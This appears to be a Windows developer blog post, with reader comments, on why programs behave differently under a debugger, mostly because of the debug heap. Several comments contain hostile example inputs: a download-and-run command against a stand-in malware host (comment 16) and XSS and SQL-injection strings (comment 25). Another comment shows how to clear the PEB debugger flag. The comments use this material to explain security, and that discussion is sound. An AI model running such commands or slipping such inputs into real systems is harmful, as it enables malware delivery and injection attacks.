Why does my program run really slow or even crash (or stop crashing, or crash differently) if running under a debugger?


More than once, a customer has noticed that running the exact same program under the debugger rather than standalone causes it to change behavior. And not just in the sense of "the timing of various operations changed, so we hit different race conditions," but in much more fundamental ways, like "my program runs really slow" or "my program crashes in a totally different location" or (even more frustrating) "my bug goes away."

What’s going on? I’m not even switching between the retail and debug versions of my program, so I’m not a victim of changing program semantics in the debug build.

When a program is running under the debugger, some parts of the system behave differently. One example is that the CloseHandle function raises an exception (I believe it's STATUS_INVALID_HANDLE but don't quote me) if you ask it to close a handle that isn't open. But the one that catches most people is that when your program runs under the debugger, an alternate heap is used. This alternate heap has a different memory layout, and it does extra work when allocating and freeing memory to help catch common heap errors, such as filling newly allocated memory with a known sentinel value.
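
If you want to see the alternate heap in action, here's a minimal sketch; run it standalone and again under a debugger and compare. (The specific fill values are undocumented implementation details of the debug heap, so treat whatever prints as informational only.)

    #include <windows.h>
    #include <stdio.h>

    int main(void)
    {
        // Allocate a block from the default process heap and dump its
        // first bytes. Standalone, the contents are typically leftover
        // garbage; under a debugger, the debug heap fills fresh
        // allocations with a sentinel pattern (an undocumented
        // implementation detail; do not depend on the exact value).
        unsigned char *p = (unsigned char *)HeapAlloc(GetProcessHeap(), 0, 16);
        if (p != NULL) {
            for (int i = 0; i < 16; i++) {
                printf("%02x ", p[i]);
            }
            printf("\n");
            HeapFree(GetProcessHeap(), 0, p);
        }
        return 0;
    }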

But this change in behavior can make your debugging harder or impossible.

So much for people’s suggestions to switch to a stricter implementation of the Windows API when a debugger is attached.

On Windows XP and higher, you can disable the debug heap even when debugging. If you are using a dbgeng-based debugger such as ntsd or WinDbg, you can pass the -hd command-line switch. If you are using Visual Studio, you can set the _NO_DEBUG_HEAP environment variable to 1.
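
For example, with myapp.exe standing in for your own program:

    rem dbgeng-based debuggers: the -hd switch disables the debug heap
    windbg -hd myapp.exe
    ntsd -hd myapp.exe

    rem Visual Studio: set the variable, then launch VS so it inherits it
    set _NO_DEBUG_HEAP=1
    devenv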

If you are debugging on a version of Windows prior to Windows XP, you can start the process without a debugger and then attach a debugger to the live process. The decision to use the debug heap is made at process startup, so attaching the debugger afterwards ensures that the retail heap is chosen.
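
For example, again with a hypothetical myapp.exe (1234 stands in for its actual process id):

    rem start the process normally, then attach by process id
    start myapp.exe
    ntsd -p 1234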

Comments (27)
  1. Adrian says:

    I never knew the debug heap stuff was tied to using a debugger. I assume it's impossible for the debugger to switch heaps when attaching to an already-running program. I also assume you're talking about the heap as in HeapAlloc, and not the debug C and C++ runtime libraries that wrap memory allocation for debugging purposes.

  2. anyfoo says:

    @Adrian, it really does seem impossible for the debugger to "switch heaps" when attaching to an already-running program. The debug heap may very well have a completely different layout, which you can't rearrange without knowing what is pointing into it (which is practically impossible to find out in C/C++). Not to mention that it would be a huge effort with very little gain… The same goes for magically "injecting" any debugging runtime libraries into running code.

  3. Mike says:

    It seems that folks who might complain about the change in behavior should remember that a debugger is just a tool to help the debugging process. Just because it's called a "debugger" doesn't mean that it's the only thing you should be using. If your program crashes in a different place in the debugger, then clearly the crash location isn't really where you're going to find the problem. A binary search of recent code changes should help. A good source code control system can help tremendously here. Same goes for heisenbugs. Raymond, I think you've posted here before something like, "Just because the OS tries to help you when you do something wrong doesn't mean that it's going to be helpful in every case."

  4. Ivo says:

    I am sure the debugger doesn't change the heap as it attaches to a process. Attaching after startup is what I used before I discovered _NO_DEBUG_HEAP on Larry Osterman's WebLog.

    Nitpicker corner: Of course I mean "Visual Studio's debugger". There may be other debuggers that try to do something more nefarious.

  5. Joshua says:

    The heisenbug you can understand is not the true heisenbug.

    You think you've seen trouble with "Aliens ate my software." You've seen nothing until you've seen an unrequested DMA from the wireless card overwrite the kernel.

  6. j b says:

    People complaining about the program running slower under a debugger have no clue about how a debugger works. I am rather impressed by how fast programs run under the control of a debugger.

    A story to illustrate why a bug can vanish under a debugger (this was neither under Windows nor on a PC!):

    We suspected early on that a stray pointer or array size violation was causing the code to crash. It crashed even under the debugger, as long as we were stepping call-by-call. This was a "stone age" program, from an age when a 2000-line function was considered OK, and we traced the problem down to a call to such a function. But where in those 35 pages of code? When line-by-line stepping was turned on, the program did not crash.

    The explanation: A stray pointer had modified an instruction. When you turn on l-b-l stepping, the debugger inserts a software breakpoint in place of the first instruction on every line; the original instruction can be retrieved from the executable file when needed. Every time a line is about to be executed, the BP transfers control to the debugger, which replaces the breakpoint with the original instruction from the executable file, decrements the program counter so that the original instruction will be executed, steps one single instruction, and re-inserts the BP before continuing with the rest of the instructions for that line. (This dance is sketched in code after this comment.)

    The stray pointer hit the first instruction on a line, overwriting it with some garbage 'instruction code', crashing the program some time later when that instruction was executed. With the debugger in l-b-l stepping, the debugger had placed a BP there, so it was the BP that got destroyed. Before executing the destroyed instruction, the debugger fetched the original instruction, overwriting the (garbled) BP with the pure, virgin instruction, which was executed before a BP was inserted again, and no trace was left of the damage.

    (There were some unfortunate circumstances, such as the location being destroyed before the debugger inserted its BP; if the BP had been in place from the very start, the debugger wouldn't have been activated at that point to re-insert the original instruction. Indeed: If our first command to the debugger was to go into l-b-l stepping for the entire program, it would crash; we verified that after having found the explanation. But the size of the program made it unrealistic to do that in ordinary debugging; you would set l-b-l stepping on selected functions when needed, not all the time and not for the entire program.)
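
    A minimal sketch of that software-breakpoint dance, assuming an x86 target and the Win32 debug API. The API calls are real; the function names and surrounding structure are illustrative only:

        #include <windows.h>

        // Plant an INT3 (0xCC) at addr, saving the original byte so it
        // can be restored before the real instruction executes.
        BOOL SetSwBreakpoint(HANDLE hProcess, LPVOID addr, BYTE *savedByte)
        {
            BYTE int3 = 0xCC;
            SIZE_T n;
            if (!ReadProcessMemory(hProcess, addr, savedByte, 1, &n)) return FALSE;
            if (!WriteProcessMemory(hProcess, addr, &int3, 1, &n)) return FALSE;
            // The CPU may have stale instruction bytes cached.
            return FlushInstructionCache(hProcess, addr, 1);
        }

        // When the breakpoint fires: restore the original byte, back the
        // instruction pointer up over the INT3, and single-step the real
        // instruction via the trap flag; the debugger re-plants the INT3
        // when the single-step exception arrives.
        BOOL StepOffBreakpoint(HANDLE hProcess, HANDLE hThread,
                               LPVOID addr, BYTE savedByte)
        {
            SIZE_T n;
            CONTEXT ctx;
            ctx.ContextFlags = CONTEXT_CONTROL;
            if (!WriteProcessMemory(hProcess, addr, &savedByte, 1, &n)) return FALSE;
            FlushInstructionCache(hProcess, addr, 1);
            if (!GetThreadContext(hThread, &ctx)) return FALSE;
            ctx.Eip -= 1;        // re-execute the restored instruction
            ctx.EFlags |= 0x100; // TF: trap after one instruction
            return SetThreadContext(hThread, &ctx);
        }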

  7. Gabe says:

    The first thing I thought of when I saw "run really slow if being debugged" was that the program has too many calls to OutputDebugString. The second thing was that it's throwing too many exceptions (which were being ignored). I was pleasantly surprised to see a third item I hadn't anticipated.

  8. Jeroen Mostert says:

    @jb: thank heavens for modern architectures with hardware breakpoints, so debuggers can do this sort of thing without modifying code. And memory protection, of course, so code can't modify itself in the first place — but that's another kettle of fish.

  9. Csaboka says:

    @Jeroen:

    Last time I checked, x86 still had support for only four hardware breakpoints. I don't think you can get far without using the good old INT3 instruction for your breakpoints.

  10. CPDaniel says:

    @jb:  Ah yes, the good old days.  I remember tracking down bugs like that in embedded code nearly 30 years ago.  Fun times.

  11. Killer{R} says:

    I use another trick if I want to prevent heap or other logic changes when debugging: find the PEB's address using the !peb command in WinDbg, then set its BeingDebugged field to zero using the eb command, and go. There are still other ways to detect a debugger (and other ways to fake them out), but this usually helps.
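
    In WinDbg that looks something like this (the address is illustrative; BeingDebugged is the byte at offset 0x2 of the PEB):

        0:000> !peb
        PEB at 7ffdf000
        ...
        0:000> eb 7ffdf000+0x2 0
        0:000> g

    The shorthand eb @$peb+2 0 does the same edit without the !peb lookup, since @$peb is a built-in pseudo-register holding the PEB address.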

  12. j b says:

    @Jeroen:

    I am currently developing SW for an embedded ARM Cortex-M0, which is just as Csaboka says: 4 HW breakpoints – simply because you cannot easily set SW breakpoints in Flash code memory (even less in one-time-programmable code memory). That doesn't get you very far. We do a lot of debugging on a simulator (running on a PC), where we can set an arbitrary number of SW BPs.

    Obviously, memory protection works wonders for debugging. But with several interpreted languages, "code" is just a data structure residing in data space, walked by an interpreter, and those HW protection mechanisms rarely support multiple data segments with individual protection. Besides, some languages invite you to write self-modifying code at one level or another, so you just cannot protect the data space representing this code. (Yes, I know that most programmers frown upon self-modifying code… yet they might maintain e.g. a list or maybe a tree of pending operations, never realizing that the list really is a 'program', although at a very high level, that is modified all the time!)

  13. Joe says:

    @jb: "Yes, I know that most programmers frown upon self-modifying code".

    Sadly not so. That's why SQL injections are such an insidious and ubiquitous security hole on the Internet.

    Mixing data and code was the worst design decision programmers ever made from a security and stability point of view, and even more tragically, lots of developers don't see it.

  14. j b says:

    @Joe: "That's why SQL injections are such an insidious and ubiquitous security hole on the Internet."

    Common programmer: "But that's not CODE! I am not modifying code, I am just building an SQL command string dynamically!"

  15. Jeroen Mostert says:

    @Csaboka: obviously you can't use HW breakpoints for everything, but I'd imagine line-by-line stepping could be done by moving ahead a single HW breakpoint, which would at least eliminate this particular kind of pernicious bug. Disclaimer: I have no idea if debuggers actually do it this way.

    @jb: I for one don't frown upon self-modifying code as a principle; I've written plenty myself back in the day. Of course, that day was well before the days of pipelined architectures, on which self-modifying code is not so hot for performance anymore. As a general approach, though, treating data as code (and vice versa) leads to marvels of flexibility, but is best approached with the level of humility appropriate to our limited capacity for understanding it (well, mine, at least).

    [Moving a single breakpoint means that the debugger would have to know ahead of time which branches are taken. (Which is the instruction "after" an if statement?) It's easier just to set breakpoints everywhere. -Raymond]
  16. Killer{R} says:

    Separating data and code isn't an absolute fix against buffer overruns & co. Corrupting only data is not much more secure than corrupting code in any real-world complex app. For example, an attacker can find in memory the command-line string of some child app that will be executed later and write "wget http://www.malware.com/payloader.exe & start payloader.exe" there, or do something else. Of course this adds some obstacles for attackers and increases the generic "price of attack", but you pay for it with the flexibility of the platform, thus increasing the generic "price of app development". The only question is which price will be higher.

  17. Joe says:

    @Killer{R} Overwriting data is bad. But overwriting code is worse. Overwriting data MIGHT enable something malicious later. Overwriting code IS game over NOW.

  18. Joshua says:

    [Moving a single breakpoint means that the debugger would have to know ahead of time which branches are taken. (Which is the instruction "after" an if statement?) It's easier just to set breakpoints everywhere. -Raymond]

    Still only 2 breakpoints. However, your point stands for call indirect.

    [If the code is optimized, you may need more than 2. (And you'd need a third in case a child function calls back re-entrantly into the original function.) Even with no optimizations, a switch would require a lot of breakpoints. -Raymond]
  19. Miff says:

    Wait, why is the debug heap a good idea? Wouldn't you want to catch uninitialized memory during debugging? Switching to a more lenient version of the API seems like an even worse option than a stricter version.

  20. caf says:

    @Csaboka, @Jeroen: The 8086 line has always had the TF (Trap Flag) which, if set, causes the processor to execute a single instruction and then call int 0x01. This is intended to be used for single-stepping.

  21. Csaboka says:

    @caf:

    Yes, but that's for single-stepping at the assembly level. If you want to step by lines of a high-level language program, calling back to the debugger for each machine instruction would be a waste of time, when the debugger can just replace the first instruction of each high-level line with an INT3 and be done with it.

  22. Killer{R} says:

    @Joe If an attacker overwrites anything, he likely knows what he's doing – he is attacking, and if the attack was executed, the game is over right then; don't reassure yourself with illusions.

    And if overwriting code was due to just a random bug in the application, not caused by an attacker's action – it's not a problem that you will crash soon. It's even an opportunity.

  23. JU says:

    @Csaboka

    We're doing embedded debuggers, and a single HW BP is sometimes all you've got. The trick is to analyze the instructions after the PC, set the BP on any change-of-flow instruction, single-step it, and repeat this sequence until you reach the beginning of a source line (sketched below).

    There is some ping-pong going on, sure, but it's usually on the order of 100 milliseconds and isn't perceived by the user.

    Debugging a PC application this way would be much faster still, as you don't need to go through USB to your debugger and a JTAG port to the CPU, but VS just takes the easy way out here. Just like in not showing you locals stored in registers when optimization is enabled.
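
    A rough sketch of that loop, in C-flavored pseudocode; every type and helper here (target_t, disasm_next, is_change_of_flow, hw_bp_set, and friends) is a hypothetical stand-in for the debugger's own services:

        // Step to the next source line using a single hardware breakpoint.
        // (All types and helpers below are hypothetical debugger services.)
        void step_to_next_line(target_t *t)
        {
            for (;;) {
                // Scan forward from the PC to whichever comes first: a
                // change-of-flow instruction or the start of a source line.
                addr_t a = disasm_next(t, get_pc(t));
                while (!is_change_of_flow(t, a) && !is_line_start(t, a))
                    a = disasm_next(t, a);

                hw_bp_set(t, a);      // park the single HW breakpoint there
                run_until_stop(t);    // let the target run until it hits it
                hw_bp_clear(t, a);

                if (is_line_start(t, get_pc(t)))
                    return;           // landed on a new source line: done
                single_step(t);       // execute the branch/call/return itself
                if (is_line_start(t, get_pc(t)))
                    return;
            }
        }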

  24. Neil says:

    I prefer WinDbg's interpretation of "next" over gdb's; as I recall, if you "next" at the end of a function, gdb steps to the next source line of the caller, while WinDbg steps to the same source line if possible (e.g. if there's a further function call to invoke). (Sadly Step Into Specific doesn't work with virtual functions.)

  25. Joe says:

    @Killer{R}.

    If an attacker gets to change your document title via foo.php?title=<script>example outputs <h1><script>example</h1> there is a potential for embarrassment, but it's not the end of the world.

    If an attacker gets to change your document's CODE via foo.php?title=<script>example outputs <h1><script>example</h1> there is a potential for serious harm.

    If an attacker using submit.php?title='DROP TABLES-- merely changes the page title to "'DROP TABLES--", you get potential embarrassment. If he gets to EXECUTE "drop tables" in your SQL database, he gets the ability to do real harm to you and your customers.

    Data != Code. Attackers nearly always have some control over the data in your application. If you provide an equivalence between code and data (e.g. HTML is a string – wait – now it's javascript; or SQL is a string – wait – now it's SQL code! Or reflection via eval, or filesystems being used for uploads as well as for serving scripts), then suddenly you need to be careful about turning attacker-provided data into attacker-provided code – since attacker-provided code is game over.

    If there is never an equivalence between data and code, the worst you can have is logic bugs such as authentication bypasses or failure to apply encryption.

    Data != Code isn't a total win for security, but it would be 95% of the journey.

  26. Joe says:

    Ok. Looks like in the first example the blog engine helpfully changed AMP-GT/LTs into < >s, thus kind of obscuring the point I was trying to make.

  27. Worst case of debugger interference is when a breakpoint gets set by the debugger not at a line number, but at an absolute offset from a symbol (function name). As the code gets modified and recompiled, that location ends up in the middle of an instruction, and the instruction gets corrupted by a stray CC. Fun.

Comments are closed.